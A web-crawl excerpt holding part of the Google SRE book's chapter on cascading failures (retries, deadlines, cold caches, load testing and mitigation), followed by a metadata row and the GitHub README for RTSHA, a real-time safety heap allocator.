- Complex load shedding and graceful degradation can cause problems themselves—excessive complexity may cause the server to trip into a degraded mode when it is not desired, or enter feedback cycles at undesired times. Design a way to quickly turn off complex graceful degradation or tune parameters if needed. Storing this configuration in a consistent system that each server can watch for changes, such as Chubby, can increase deployment speed, but also introduces its own risks of synchronized failure.
## Retries
Suppose the code in the frontend that talks to the backend implements retries naively. It retries after encountering a failure and caps the number of backend RPCs per logical request to 10. Consider this code in the frontend, using gRPC in Go:
func exampleRpcCall(client pb.ExampleClient, request pb.Request) *pb.Response { // Set RPC timeout to 5 seconds. opts := grpc.WithTimeout(5 * time.Second) // Try up to 10 times to make the RPC call. attempts := 10 for attempts > 0 { conn, err := grpc.Dial(*serverAddr, opts...) if err != nil { // Something went wrong in setting up the connection. Try again. attempts-- continue } defer conn.Close() // Create a client stub and make the RPC call. client := pb.NewBackendClient(conn) response, err := client.MakeRequest(context.Background, request) if err != nil { // Something went wrong in making the call. Try again. attempts-- continue } return response } grpclog.Fatalf("ran out of attempts") }
This system can cascade in the following way:
- Assume our backend has a known limit of 10,000 QPS per task, after which point all further requests are rejected in an attempt at graceful degradation.
- The frontend calls
`MakeRequest`
at a constant rate of 10,100 QPS and overloads the backend by 100 QPS, which the backend rejects. - Those 100 failed QPS are retried in
`MakeRequest`
every 1,000 ms, and probably succeed. But the retries are themselves adding to the requests sent to the backend, which now receives 10,200 QPS—200 QPS of which are failing due to overload. - The volume of retries grows: 100 QPS of retries in the first second leads to 200 QPS, then to 300 QPS, and so on. Fewer and fewer requests are able to succeed on their first attempt, so less useful work is being performed as a fraction of requests to the backend.
- If the backend task is unable to handle the increase in load—which is consuming file descriptors, memory, and CPU time on the backend—it can melt down and crash under the sheer load of requests and retries. This crash then redistributes the requests it was receiving across the remaining backend tasks, in turn further overloading those tasks.
Some simplifying assumptions were made here to illustrate this scenario,110 but the point remains that retries can destabilize a system. Note that both temporary load spikes and slow increases in usage can cause this effect.
Even if the rate of calls to `MakeRequest`
decreases to pre-meltdown levels (9,000 QPS, for example), depending on how much returning a failure costs the backend, the problem might not go away. Two factors are at play here:
- If the backend spends a significant amount of resources processing requests that will ultimately fail due to overload, then the retries themselves may be keeping the backend in an overloaded mode.
- The backend servers themselves may not be stable. Retries can amplify the effects seen in Server Overload.
If either of these conditions is true, in order to dig out of this outage, you must dramatically reduce or eliminate the load on the frontends until the retries stop and the backends stabilize.
This pattern has contributed to several cascading failures, whether the frontends and backends communicate via RPC messages, the “frontend” is client JavaScript code issuing `XmlHttpRequest`
calls to an endpoint and retries on failure, or the retries originate from an offline sync protocol that retries aggressively when it encounters a failure.
When issuing automatic retries, keep in mind the following considerations:
- Most of the backend protection strategies described in Preventing Server Overload apply. In particular, testing the system can highlight problems, and graceful degradation can reduce the effect of the retries on the backend.
- Always use randomized exponential backoff when scheduling retries. See also "Exponential Backoff and Jitter" in the AWS Architecture Blog [Bro15]. If retries aren’t randomly distributed over the retry window, a small perturbation (e.g., a network blip) can cause retry ripples to schedule at the same time, which can then amplify themselves [Flo94].
- Limit retries per request. Don’t retry a given request indefinitely.
- Consider having a server-wide retry budget. For example, only allow 60 retries per minute in a process, and if the retry budget is exceeded, don’t retry; just fail the request. This strategy can contain the retry effect and be the difference between a capacity planning failure that leads to some dropped queries and a global cascading failure.
- Think about the service holistically and decide if you really need to perform retries at a given level. In particular, avoid amplifying retries by issuing retries at multiple levels: a single request at the highest layer may produce a number of attempts as large as the
*product*of the number of attempts at each layer to the lowest layer. If the database can’t service requests because it’s overloaded, and the backend, frontend, and JavaScript layers all issue 3 retries (4 attempts), then a single user action may create 64 attempts (4^3) on the database. This behavior is undesirable when the database is returning those errors because it’s overloaded. - Use clear response codes and consider how different failure modes should be handled. For example, separate retriable and nonretriable error conditions. Don’t retry permanent errors or malformed requests in a client, because neither will ever succeed. Return a specific status when overloaded so that clients and other layers back off and do not retry.
In an emergency, it may not be obvious that an outage is due to bad retry behavior. Graphs of retry rates can be an indication of bad retry behavior, but may be confused as a symptom instead of a compounding cause. In terms of mitigation, this is a special case of the insufficient capacity problem, with the additional caveat that you must either fix the retry behavior (usually requiring a code push), reduce load significantly, or cut requests off entirely.
## Latency and Deadlines
When a frontend sends an RPC to a backend server, the frontend consumes resources waiting for a reply. RPC deadlines define how long a request can wait before the frontend gives up, limiting the time that the backend may consume the frontend’s resources.
### Picking a deadline
It’s usually wise to set a deadline. Setting either no deadline or an extremely high deadline may cause short-term problems that have long since passed to continue to consume server resources until the server restarts.
High deadlines can result in resource consumption in higher levels of the stack when lower levels of the stack are having problems. Short deadlines can cause some more expensive requests to fail consistently. Balancing these constraints to pick a good deadline can be something of an art.
### Missing deadlines
A common theme in many cascading outages is that servers spend resources handling requests that will exceed their deadlines on the client. As a result, resources are spent while no progress is made: you don’t get credit for late assignments with RPCs.
Suppose an RPC has a 10-second deadline, as set by the client. The server is very overloaded, and as a result, it takes 11 seconds to move from a queue to a thread pool. At this point, the client has already given up on the request. Under most circumstances, it would be unwise for the server to attempt to handle this request, because it would be doing work for which no credit will be granted—the client doesn’t care what work the server does after the deadline has passed, because it’s given up on the request already.
If handling a request is performed over multiple stages (e.g., there are a few callbacks and RPC calls), the server should check the deadline left at each stage before attempting to perform any more work on the request. For example, if a request is split into parsing, backend request, and processing stages, it may make sense to check that there is enough time left to handle the request before each stage.
### Deadline propagation
Rather than inventing a deadline when sending RPCs to backends, servers should employ deadline propagation.
With deadline propagation, a deadline is set high in the stack (e.g., in the frontend). The tree of RPCs emanating from an initial request will all have the same absolute deadline. For example, if server *A* selects a 30-second deadline, and processes the request for 7 seconds before sending an RPC to server *B*, the RPC from *A* to *B* will have a 23-second deadline. If server *B* takes 4 seconds to handle the request and sends an RPC to server *C*, the RPC from *B* to *C* will have a 19-second deadline, and so on. Ideally, each server in the request tree implements deadline propagation.
Without deadline propagation, the following scenario may occur:
- Server
*A*sends an RPC to server*B*with a 10-second deadline. - Server
*B*takes 8 seconds to start processing the request and then sends an RPC to server*C*. - If server
*B*uses deadline propagation, it should set a 2-second deadline, but suppose it instead uses a hardcoded 20-second deadline for the RPC to server*C*. - Server
*C*pulls the request off its queue after 5 seconds.
Had server *B* used deadline propagation, server *C* could immediately give up on the request because the 2-second deadline was exceeded. However, in this scenario, server *C* processes the request thinking it has 15 seconds to spare, but is not doing useful work, since the request from server *A* to server *B* has already exceeded its deadline.
You may want to reduce the outgoing deadline a bit (e.g., a few hundred milliseconds) to account for network transit times and post-processing in the client.
Also consider setting an upper bound for outgoing deadlines. You may want to limit how long the server waits for outgoing RPCs to noncritical backends, or for RPCs to backends that typically complete in a short duration. However, be sure to understand your traffic mix, because you might otherwise inadvertently make particular types of requests fail all the time (e.g., requests with large payloads, or requests that require responding to a lot of computation).
There are some exceptions for which servers may wish to continue processing a request after the deadline has elapsed. For example, if a server receives a request that involves performing some expensive catchup operation and periodically checkpoints the progress of the catchup, it would be a good idea to check the deadline only after writing the checkpoint, instead of after the expensive operation.
### Cancellation propagation
Propagating cancellations reduces unneeded or doomed work by advising servers in an RPC call stack that their efforts are no longer necessary. To reduce latency, some systems use "hedged requests" [Dea13] to send RPCs to a primary server, then some time later, send the same request to other instances of the same service in case the primary is slow in responding; once the client has received a response from any server, it sends messages to the other servers to cancel the now-superfluous requests. Those requests may themselves transitively fan out to many other servers, so cancellations should be propagated throughout the entire stack.
This approach can also be used to avoid the potential leakage that occurs if an initial RPC has a long deadline, but subsequent critical RPCs between deeper layers of the stack receive errors which can't succeed on retry, or have short deadlines and time out. Using only simple deadline propagation, the initial call continues to use server resources until it eventually times out, despite being doomed to failure. Sending fatal errors or timeouts up the stack and cancelling other RPCs in the call tree prevents unneeded work if the request as a whole can't be fulfilled.
### Bimodal latency
Suppose that the frontend from the preceding example consists of 10 servers, each with 100 worker threads. This means that the frontend has a total of 1,000 threads of capacity. During usual operation, the frontends perform 1,000 QPS and requests complete in 100 ms. This means that the frontends usually have 100 worker threads occupied out of the 1,000 configured worker threads (1,000 QPS * 0.1 seconds).
Suppose an event causes 5% of the requests to never complete. This could be the result of the unavailability of some Bigtable row ranges, which renders the requests corresponding to that Bigtable keyspace unservable. As a result, 5% of the requests hit the deadline, while the remaining 95% of the requests take the usual 100 ms.
With a 100-second deadline, 5% of requests would consume 5,000 threads (50 QPS * 100 seconds), but the frontend doesn’t have that many threads available. Assuming no other secondary effects, the frontend will only be able to handle 19.6% of the requests (1,000 threads available / (5,000 + 95) threads’ worth of work), resulting in an 80.4% error rate.
Therefore, instead of only 5% of requests receiving an error (those that didn’t complete due to keyspace unavailability), most requests receive an error.
The following guidelines can help address this class of problems:
- Detecting this problem can be very hard. In particular, it may not be clear that bimodal latency is the cause of an outage when you are looking at
*mean*latency. When you see a latency increase, try to look at the*distribution*of latencies in addition to the averages. - This problem can be avoided if the requests that don’t complete return with an error early, rather than waiting the full deadline. For example, if a backend is unavailable, it’s usually best to immediately return an error for that backend, rather than consuming resources until the backend is available. If your RPC layer supports a fail-fast option, use it.
- Having deadlines several orders of magnitude longer than the mean request latency is usually bad. In the preceding example, a small number of requests initially hit the deadline, but the deadline was three orders of magnitude larger than the normal mean latency, leading to thread exhaustion.
- When using shared resources that can be exhausted by some keyspace, consider either limiting in-flight requests by that keyspace or using other kinds of abuse tracking. Suppose your backend processes requests for different clients that have wildly different performance and request characteristics. You might consider only allowing 25% of your threads to be occupied by any one client in order to provide fairness in the face of heavy load by any single client misbehaving.
# Slow Startup and Cold Caching
Processes are often slower at responding to requests immediately after starting than they will be in steady state. This slowness can be caused by either or both of the following:
- Required initialization
- Setting up connections upon receiving the first request that needs a given backend
- Runtime performance improvements in some languages, particularly Java
- Just-In-Time compilation, hotspot optimization, and deferred class loading
Similarly, some binaries are less efficient when caches aren’t filled. For example, in the case of some of Google’s services, most requests are served out of caches, so requests that miss the cache are significantly more expensive. In steady-state operation with a warm cache, only a few cache misses occur, but when the cache is completely empty, 100% of requests are costly. Other services might employ caches to keep a user’s state in RAM. This might be accomplished through hard or soft stickiness between reverse proxies and service frontends.
If the service is not provisioned to handle requests under a cold cache, it’s at greater risk of outages and should take steps to avoid them.
The following scenarios can lead to a cold cache:
- Turning up a new cluster
- A recently added cluster will have an empty cache.
- Returning a cluster to service after maintenance
- The cache may be stale.
- Restarts
- If a task with a cache has recently restarted, filling its cache will take some time. It may be worthwhile to move caching from a server to a separate binary like memcache, which also allows cache sharing between many servers, albeit at the cost of introducing another RPC and slight additional latency.
If caching has a significant effect on the service,111 you may want to use one or some of the following strategies:
- Overprovision the service. It’s important to note the distinction between a latency cache versus a capacity cache: when a latency cache is employed, the service can sustain its expected load with an empty cache, but a service using a capacity cache cannot sustain its expected load under an empty cache. Service owners should be vigilant about adding caches to their service, and make sure that any new caches are either latency caches or are sufficiently well engineered to safely function as capacity caches. Sometimes caches are added to a service to improve performance, but actually wind up being hard dependencies.
- Employ general cascading failure prevention techniques. In particular, servers should reject requests when they’re overloaded or enter degraded modes, and testing should be performed to see how the service behaves after events such as a large restart.
- When adding load to a cluster, slowly increase the load. The initially small request rate warms up the cache; once the cache is warm, more traffic can be added. It’s a good idea to ensure that all clusters carry nominal load and that the caches are kept warm.
## Always Go Downward in the Stack
In the example Shakespeare service, the frontend talks to a backend, which in turn talks to the storage layer. A problem that manifests in the storage layer can cause problems for servers that talk to it, but fixing the storage layer will usually repair both the backend and frontend layers.
However, suppose the backends cross-communicate amongst each other. For example, the backends might proxy requests to one another to change who owns a user when the storage layer can’t service a request. This intra-layer communication can be problematic for several reasons:
-
The communication is susceptible to a distributed deadlock. Backends may use the same thread pool to wait on RPCs sent to remote backends that are simultaneously receiving requests from remote backends. Suppose backend
*A*’s thread pool is full. Backend*B*sends a request to backend*A*and uses a thread in backend*B*until backend*A*’s thread pool clears. This behavior can cause the thread pool saturation to spread. -
If intra-layer communication increases in response to some kind of failure or heavy load condition (e.g., load rebalancing that is more active under high load), intra-layer communication can quickly switch from a low to high intra-layer request mode when the load increases enough.
For example, suppose a user has a primary backend and a predetermined hot standby secondary backend in a different cluster that can take over the user. The primary backend proxies requests to the secondary backend as a result of errors from the lower layer or in response to heavy load on the master. If the entire system is overloaded, primary to secondary proxying will likely increase and add even more load to the system, due to the additional cost of parsing and waiting on the request to the secondary in the primary.
-
Depending on the criticality of the cross-layer communication, bootstrapping the system may become more complex.
It’s usually better to avoid intra-layer communication—i.e., possible cycles in the communication path—in the user request path. Instead, have the client do the communication. For example, if a frontend talks to a backend but guesses the wrong backend, the backend should not proxy to the correct backend. Instead, the backend should tell the frontend to retry its request on the correct backend.
# Triggering Conditions for Cascading Failures
When a service is susceptible to cascading failures, there are several possible disturbances that can initiate the domino effect. This section identifies some of the factors that trigger cascading failures.
## Process Death
Some server tasks may die, reducing the amount of available capacity. Tasks might die because of a Query of Death (an RPC whose contents trigger a failure in the process), cluster issues, assertion failures, or a number of other reasons. A very small event (e.g., a couple of crashes or tasks rescheduled to other machines) may cause a service on the brink of falling to break.
## Process Updates
Pushing a new version of the binary or updating its configuration may initiate a cascading failure if a large number of tasks are affected simultaneously. To prevent this scenario, either account for necessary capacity overhead when setting up the service’s update infrastructure, or push off-peak. Dynamically adjusting the number of in-flight task updates based on the volume of requests and available capacity may be a workable approach.
## New Rollouts
A new binary, configuration changes, or a change to the underlying infrastructure stack can result in changes to request profiles, resource usage and limits, backends, or a number of other system components that can trigger a cascading failure.
During a cascading failure, it’s usually wise to check for recent changes and consider reverting them, particularly if those changes affected capacity or altered the request profile.
Your service should implement some type of change logging, which can help quickly identify recent changes.
## Organic Growth
In many cases, a cascading failure isn’t triggered by a specific service change, but because a growth in usage wasn’t accompanied by an adjustment to capacity.
## Planned Changes, Drains, or Turndowns
If your service is multihomed, some of your capacity may be unavailable because of maintenance or outages in a cluster. Similarly, one of the service’s critical dependencies may be drained, resulting in a reduction in capacity for the upstream service due to drain dependencies, or an increase in latency due to having to send the requests to a more distant cluster.
### Request profile changes
A backend service may receive requests from different clusters because a frontend service shifted its traffic due to load balancing configuration changes, changes in the traffic mix, or cluster fullness. Also, the average cost to handle an individual payload may have changed due to frontend code or configuration changes. Similarly, the data handled by the service may have changed organically due to increased or differing usage by existing users: for instance, both the number and size of images, *per user*, for a photo storage service tend to increase over time.
### Resource limits
Some cluster operating systems allow resource overcommitment. CPU is a fungible resource; often, some machines have some amount of slack CPU available, which provides a bit of a safety net against CPU spikes. The availability of this slack CPU differs between cells, and also between machines within the cell.
Depending upon this slack CPU as your safety net is dangerous. Its availability is entirely dependent on the behavior of the other jobs in the cluster, so it might suddenly drop out at any time. For example, if a team starts a MapReduce that consumes a lot of CPU and schedules on many machines, the aggregate amount of slack CPU can suddenly decrease and trigger CPU starvation conditions for unrelated jobs. When performing load tests, make sure that you remain within your committed resource limits.
# Testing for Cascading Failures
The specific ways in which a service will fail can be very hard to predict from first principles. This section discusses testing strategies that can detect if services are susceptible to cascading failures.
You should test your service to determine how it behaves under heavy load in order to gain confidence that it won’t enter a cascading failure under various circumstances.
## Test Until Failure and Beyond
Understanding the behavior of the service under heavy load is perhaps the most important first step in avoiding cascading failures. Knowing how your system behaves when it is overloaded helps to identify what engineering tasks are the most important for long-term fixes; at the very least, this knowledge may help bootstrap the debugging process for on-call engineers when an emergency arises.
Load test components until they break. As load increases, a component typically handles requests successfully until it reaches a point at which it can’t handle more requests. At this point, the component should ideally start serving errors or degraded results in response to additional load, but not significantly reduce the rate at which it successfully handles requests. A component that is highly susceptible to a cascading failure will start crashing or serving a very high rate of errors when it becomes overloaded; a better designed component will instead be able to reject a few requests and survive.
Load testing also reveals where the breaking point is, knowledge that’s fundamental to the capacity planning process. It enables you to test for regressions, provision for worst-case thresholds, and to trade off utilization versus safety margins.
Because of caching effects, gradually ramping up load may yield different results than immediately increasing to expected load levels. Therefore, consider testing both gradual and impulse load patterns.
You should also test and understand how the component behaves as it returns to nominal load after having been pushed well beyond that load. Such testing may answer questions such as:
- If a component enters a degraded mode on heavy load, is it capable of exiting the degraded mode without human intervention?
- If a couple of servers crash under heavy load, how much does the load need to drop in order for the system to stabilize?
If you’re load testing a stateful service or a service that employs caching, your load test should track state between multiple interactions and check correctness at high load, which is often where subtle concurrency bugs hit.
Keep in mind that individual components may have different breaking points, so load test each component separately. You won’t know in advance which component may hit the wall first, and you want to know how your system behaves when it does.
If you believe your system has proper protections against being overloaded, consider performing failure tests in a small slice of production to find the point at which the components in your system fail under real traffic. These limits may not be adequately reflected by synthetic load test traffic, so real traffic tests may provide more realistic results than load tests, at the risk of causing user-visible pain. Be careful when testing on real traffic: make sure that you have extra capacity available in case your automatic protections don’t work and you need to manually fail over. You might consider some of the following production tests:
- Reducing task counts quickly or slowly over time, beyond expected traffic patterns
- Rapidly losing a cluster’s worth of capacity
- Blackholing various backends
## Test Popular Clients
Understand how large clients use your service. For example, you want to know if clients:
- Can queue work while the service is down
- Use randomized exponential backoff on errors
- Are vulnerable to external triggers that can create large amounts of load (e.g., an externally triggered software update might clear an offline client’s cache)
Depending on your service, you may or may not be in control of all the client code that talks to your service. However, it’s still a good idea to have an understanding of how large clients that interact with your service will behave.
The same principles apply to large internal clients. Stage system failures with the largest clients to see how they react. Ask internal clients how they access your service and what mechanisms they use to handle backend failure.
## Test Noncritical Backends
Test your noncritical backends, and make sure their unavailability does not interfere with the critical components of your service.
For example, suppose your frontend has critical and noncritical backends. Often, a given request includes both critical components (e.g., query results) and noncritical components (e.g., spelling suggestions). Your requests may significantly slow down and consume resources waiting for noncritical backends to finish.
In addition to testing behavior when the noncritical backend is unavailable, test how the frontend behaves if the noncritical backend never responds (for example, if it is blackholing requests). Backends advertised as noncritical can still cause problems on frontends when requests have long deadlines. The frontend should not start rejecting lots of requests, running out of resources, or serving with very high latency when a noncritical backend blackholes.
# Immediate Steps to Address Cascading Failures
Once you have identified that your service is experiencing a cascading failure, you can use a few different strategies to remedy the situation—and of course, a cascading failure is a good opportunity to use your incident management protocol (Managing Incidents).
## Increase Resources
If your system is running at degraded capacity and you have idle resources, adding tasks can be the most expedient way to recover from the outage. However, if the service has entered a death spiral of some sort, adding more resources may not be sufficient to recover.
## Stop Health Check Failures/Deaths
Some cluster scheduling systems, such as Borg, check the health of tasks in a job and restart tasks that are unhealthy. This practice may create a failure mode in which health-checking itself makes the service unhealthy. For example, if half the tasks aren’t able to accomplish any work because they’re starting up and the other half will soon be killed because they’re overloaded and failing health checks, temporarily disabling health checks may permit the system to stabilize until all the tasks are running.
Process health checking (“is this binary responding *at all*?”) and service health checking (“is this binary able to respond to *this class of requests* right now?”) are two conceptually distinct operations. Process health checking is relevant to the cluster scheduler, whereas service health checking is relevant to the load balancer. Clearly distinguishing between the two types of health checks can help avoid this scenario.
## Restart Servers
If servers are somehow wedged and not making progress, restarting them may help. Try restarting servers when:
- Java servers are in a GC death spiral
- Some in-flight requests have no deadlines but are consuming resources, leading them to block threads, for example
- The servers are deadlocked
Make sure that you identify the source of the cascading failure before you restart your servers. Make sure that taking this action won’t simply shift around load. Canary this change, and make it slowly. Your actions may amplify an existing cascading failure if the outage is actually due to an issue like a cold cache.
## Drop Traffic
Dropping load is a big hammer, usually reserved for situations in which you have a true cascading failure on your hands and you cannot fix it by other means. For example, if heavy load causes most servers to crash as soon as they become healthy, you can get the service up and running again by:
- Addressing the initial triggering condition (by adding capacity, for example).
- Reducing load enough so that the crashing stops. Consider being aggressive here—if the entire service is crash-looping, only allow, say, 1% of the traffic through.
- Allowing the majority of the servers to become healthy.
- Gradually ramping up the load.
This strategy allows caches to warm up, connections to be established, etc., before load returns to normal levels.
Obviously, this tactic will cause a lot of user-visible harm. Whether or not you’re able to (or if you even *should*) drop traffic indiscriminately depends on how the service is configured. If you have some mechanism to drop less important traffic (e.g., prefetching), use that mechanism first.
It is important to keep in mind that this strategy enables you to recover from a cascading outage once the underlying problem is fixed. If the issue that started the cascading failure is not fixed (e.g., insufficient global capacity), then the cascading failure may trigger shortly after all traffic returns. Therefore, before using this strategy, consider fixing (or at least papering over) the root cause or triggering condition. For example, if the service ran out of memory and is now in a death spiral, adding more memory or tasks should be your first step.
## Enter Degraded Modes
Serve degraded results by doing less work or dropping unimportant traffic. This strategy must be engineered into your service, and can be implemented only if you know which traffic can be degraded and you have the ability to differentiate between the various payloads.
## Eliminate Batch Load
Some services have load that is important, but not critical. Consider turning off those sources of load. For example, if index updates, data copies, or statistics gathering consume resources of the serving path, consider turning off those sources of load during an outage.
## Eliminate Bad Traffic
If some queries are creating heavy load or crashes (e.g., queries of death), consider blocking them or eliminating them via other means.
##### Cascading Failure and Shakespeare
A documentary about Shakespeare’s works airs in Japan, and explicitly points to our Shakespeare service as an excellent place to conduct further research. Following the broadcast, traffic to our Asian datacenter surges beyond the service’s capacity. This capacity problem is further compounded by a major update to the Shakespeare service that simultaneously occurs in that datacenter.
Fortunately, a number of safeguards are in place that help mitigate the potential for failure. The Production Readiness Review process identified some issues that the team already addressed. For example, the developers built graceful degradation into the service. As capacity becomes scarce, the service no longer returns pictures alongside text or small maps illustrating where a story takes place. And depending on its purpose, an RPC that times out is either not retried (for example, in the case of the aforementioned pictures), or is retried with a randomized exponential backoff. Despite these safeguards, the tasks fail one by one and are then restarted by Borg, which drives the number of working tasks down even more.
As a result, some graphs on the service dashboard turn an alarming shade of red and SRE is paged. In response, SREs temporarily add capacity to the Asian datacenter by increasing the number of tasks available for the Shakespeare job. By doing so, they’re able to restore the Shakespeare service in the Asian cluster.
Afterward, the SRE team writes a postmortem detailing the chain of events, what went well, what could have gone better, and a number of action items to prevent this scenario from occurring again. For example, in the case of a service overload, the GSLB load balancer will redirect some traffic to neighboring datacenters. Also, the SRE team turns on autoscaling, so that the number of tasks automatically increases with traffic, so they don’t have to worry about this type of issue again.
# Closing Remarks
When systems are overloaded, something needs to give in order to remedy the situation. Once a service passes its breaking point, it is better to allow some user-visible errors or lower-quality results to slip through than try to fully serve every request. Understanding where those breaking points are and how the system behaves beyond them is critical for service owners who want to avoid cascading failures.
Without proper care, some system changes meant to reduce background errors or otherwise improve the steady state can expose the service to greater risk of a full outage. Retrying on failures, shifting load around from unhealthy servers, killing unhealthy servers, adding caches to improve performance or reduce latency: all of these might be implemented to improve the normal case, but can improve the chance of causing a large-scale failure. Be careful when evaluating changes to ensure that one outage is not being traded for another.
107See Wikipedia, “Positive feedback,” *https://en.wikipedia.org/wiki/Positive_feedback*.
108A watchdog is often implemented as a thread that wakes up periodically to see whether work has been done since the last time it checked. If not, it assumes that the server is stuck and kills it. For instance, requests of a known type can be sent to the server at regular intervals; if one hasn’t been received or processed when expected, this may indicate failure—of the server, the system sending requests, or the intermediate network.
109This is often not a good assumption due to geography; see also Job and Data Organization.
110An instructive exercise, left for the reader: write a simple simulator and see how the amount of useful work the backend can do varies with how much it’s overloaded and how many retries are permitted.
111Sometimes you find that a meaningful proportion of your actual serving capacity is as a function of serving from a cache, and if you lost access to that cache, you wouldn’t actually be able to serve that many queries. A similar observation holds for latency: a cache can help you achieve latency goals (by lowering the average response time when the query is servable from cache) that you possibly couldn’t meet without that cache.
| true | true | true | null |
2024-10-12 00:00:00
|
2017-01-01 00:00:00
| null |
article
|
sre.google
|
Google SRE
| null | null |
38,278,386 |
https://github.com/borisRadonic/RTSHA
|
GitHub - borisRadonic/RTSHA: Real Time Safety Heap Allocator
|
Borisradonic
|
Good programming practices for real time emmbedded applications includes the rule that all values must allocated on the stack if possible. There are some situations where is this not possible like when the size of the value is unknown or the vectors are growing in size over time.
In those situations memory from the heap must be dinamically usig heap allocator functions like **malloc**() and **free**().
There are various heap allocation algorithms used across platforms, such as Dlmalloc, Phkmalloc, ptmalloc, jemalloc, Google Chrome's PartitionAlloc, and the glibc heap allocator. While each has its benefits, they aren't tailored for hard real-time environments prioritizing speed, determinism, minimal fragmentation, and memory safety.
**Real Time Safety Heap Allocator** is an ultra-fast memory management system suitable for bare metal platforms or in conjunction with small RT OS for several reasons:
-
**Memory Management**: Heap algorithms are responsible for managing dynamic memory allocation and deallocation in a system. On platforms, where the operating system is absent or minimal, managing memory becomes crucial. RTSHA algorithm ensures efficient allocation and deallocation of memory resources, minimizes fragmentation issues, or undefined behavior. -
**Deterministic Behavior**: Platforms often require real-time or safety-critical applications where predictability and determinism are vital. RTSHA algorithms provide guarantees on the worst-case execution time for memory allocation and deallocation operations. This predictability ensures that the system can meet its timing constraints consistently. -
**Certification Requirements:**Safety-critical systems often require compliance with industry standards and regulations, such as DO-178C for avionics, ISO 26262 for automotive, or IEC 61508 for industrial control systems. These standards emphasize the need for certified software components, including memory management. High code quality, good documentation, and standards used during the development of HR-SHA, such as MISRA, etc., can meet the certification requirements, accelerate and streamline the certification process and demonstrate the reliability and robustness of their systems. -
**Resource Optimization**: Bare metal platforms typically have limited resources, including memory. RTSHA optimizes memory utilization by minimizing fragmentation and efficiently managing memory allocation requests. This optimization is crucial for maximizing the available resources and ensuring the system operates within its limitations.
Overall, using the RTSHA on bare metal platforms enhances memory management, promotes determinism, ensures memory safety, meets some important safety certification requirements, and optimizes resource utilization. These factors are essential for developing reliable, predictable, and secure systems in safety-critical environments.
- About RTSHA🌌
- RTSHA Algorithms🧠
- Modern C++ and STL📚
- Project Status🏗
- Building🛠
- Documentation📖
- Examples💡
**Predictable Execution Time**: The worst-case execution time for the 'malloc, free' and 'new delete C++' functions must be deterministic and independent of application data.
**Memory Pool Preservation**: The algorithm must strive to minimize the likelihood of exhausting the memory pool. This can be achieved by reducing fragmentation and minimizing memory waste.
**Fragmentation Management**: The algorithms should effectively manage and reduce external fragmentation, which can limit the amount of available free memory.
**Defined Behavior**: The allocator must aim to eliminate any undefined behavior to ensure consistency and reliability in its operations.
**Functional Safety**; The allocator must adhere to the principles of functional safety. It should consistently perform its intended function during normal and abnormal conditions. Its design must consider and mitigate possible failure modes, errors, and faults.
- When we talk about 'functional safety'in RTSHA, we are not referring to 'security'. "Functional safety" refers to the aspect of a system's design that ensures it operates correctly in response to its inputs and failures, minimizing risk of physical harm, while "security" refers to the measures taken to protect a system from unauthorized access, disruption, or damage. *
**Error Detection and Handling**: The allocator should have mechanisms to detect and handle memory allocation errors or failures. This can include robust error reporting, and fallback or recovery strategies in case of allocation failures.
**Support for Different Algorithms**: The allocator should be flexible enough to support different memory allocation algorithms, allowing it to be adapted to the specific needs of different applications.
**Configurability**: The allocator should be configurable to suit the requirements of specific platforms and applications. This includes adjusting parameters like the size of the memory pool, the size of allocation blocks, and the allocation strategy.
**Efficiency**: The allocator should be efficient, in terms of both time and space. It should aim for minimal overhead and quick allocation and deallocation times.
**Readability and Maintainability**: The code for the allocator should be clear, well-documented, and easy to maintain. This includes adhering to good coding practices, such as using meaningful variable names and including comments that explain the code.
**Compatibility**: The allocator should be compatible with the system it is designed for and work well with other components of the system.
There are several different algorithms that can be used for heap allocation supported by RTSHA:
**Small Fix Memory Pages**
This algorithm is an approach to memory management that is often used in specific situations where objects of a certain size are frequently allocated and deallocated. By using of uses 'Fixed chunk size' algorithm greatly simplies the memory allocation process and reduce fragmentation.
The memory is divided into pages of chunks(blocks) of a fixed size (32, 64, 128, 256 and 512 bytes). When an allocation request comes in, it can simply be given one of these blocks. This means that the allocator doesn't have to search through the heap to find a block of the right size, which can improve performance. The free blocks memory is used as 'free list' storage. The list is implemented using a standard linked list. However, by enabling the precompiler option USE_STL_LIST, the STL version of the forward list can also be utilized. There isn't a significant performance difference between the two implementations.
Deallocations are also straightforward, as the block is added back to the list of available chunks. There's no need to merge adjacent free blocks, as there is with some other allocation strategies, which can also improve performance.
However, fixed chunk size allocation is not a good fit for all scenarios. It works best when the majority of allocations are of the same size, or a small number of different sizes. If allocations requests are of widely varying sizes, then this approach can lead to a lot of wasted memory, as small allocations take up an entire chunk, and large allocations require multiple chunks.
Small Fix Memory Page is also used internaly by "Power Two Memory Page" and "Big Memory Page" algorithms.
**Power Two Memory Pages**
This algorithm is a more intricate system that exclusively allows blocks of sizes that are powers of two. This design makes merging free blocks back together easier and significantly reduces fragmentation. The core of this algorithm is based on an array of free lists. Each list corresponds to one group of power-of-two sizes. For instance, there's a dedicated list for 64-byte free blocks, another for 128-byte blocks, and so on. This structured approach ensures that blocks of a specific size are readily available, optimizing memory management and access. This method ensures efficient block allocation and deallocation operations, making the most of the power-of-two size constraint. Utilizing the combination of power-of-two block sizes with an array of free lists and a binary search mechanism, this algorithm strikes a balance between memory efficiency and operational speed. This is a fairly efficient method of allocating memory, particularly useful for systems where memory fragmentation is an important concern. The algorithm divides memory into partitions to try to minimize fragmentation and the 'Best Fit' algorithm searches the page to find the smallest block that is large enough to satisfy the allocation. Furthermore, this system is resistant to breakdowns due to its algorithmic approach to allocating and deallocating memory. The coalescing operation helps ensure that large contiguous blocks of memory can be reformed after they are freed, reducing the likelihood of fragmentation over time. Coalescing relies on having free blocks of the same size available, which is not always the case, and so this system does not completely eliminate fragmentation but rather aims to minimize it.
**Big Memory Pages**
Note: This algorithm is primarily designed for test purposes, especially for systems with constrained memory. When compared to the "Small Fixed Memory Pages" and "Power Two Memory Pages" algorithms, this approach may exhibit relatively slower (inperformant) behaviors. The "Big Memory Pages" algorithm employs the "Best Fit" strategy, which is complemented by a "Red-Black" balanced tree. The Red-Black tree ensures worst-case guarantees for insertion, deletion, and search times, making it predictable in performance. A key distinction between this system and the "Power Two Memory Page" is in how they handle memory blocks. Unlike the latter, "Big Memory Pages" does not restrict memory to be partitioned exclusively into power-of-two sizes. Instead, variable block sizes are allowed, providing more flexibility. Additionally, once memory blocks greater than 512 bytes are released, they are promptly merged or coalesced, optimizing the memory usage. Despite its features, it's essential to understand the specific use-cases and limitations of this algorithm and to choose the most suitable one based on the system's requirements and constraints.
The use of 'Small Fixed Memory Pages' in combination with 'Power Two Memory Pages' is recommended for all real time systems.
